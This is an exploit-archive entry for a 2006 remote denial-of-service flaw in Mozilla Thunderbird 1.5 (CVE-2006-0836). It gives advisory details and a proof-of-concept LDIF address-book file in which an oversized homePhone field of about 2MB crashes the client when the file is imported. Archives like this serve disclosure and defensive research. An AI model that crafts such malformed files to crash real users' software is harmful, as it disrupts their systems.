[] NeoSense
E X P L O I T S
title author type platform port cve id

Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service

Author: DrFrancky
type: dos
platform: linux
port: 
date_added: 2006-02-17 
date_updated: 2013-08-02 
verified: 1 
codes: CVE-2006-0836;OSVDB-23488 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/16716/info

Mozilla Thunderbird is prone to a remote denial-of-service vulnerability.

The issue presents itself when the application handles a specially crafted address book file.

Mozilla Thunderbird 1.5 is reportedly affected by this issue. Other versions may be vulnerable as well.

POC: create a file.ldif and insert following then import it in address book:
n: cn=Test POC by DrFrancky@securax.org,mail=drfrancky@securax.org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky@securax.org
cn: POC by DrFrancky@securax.org
mozillaNickname: DrFrancky
mail: drfrancky@securax.org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.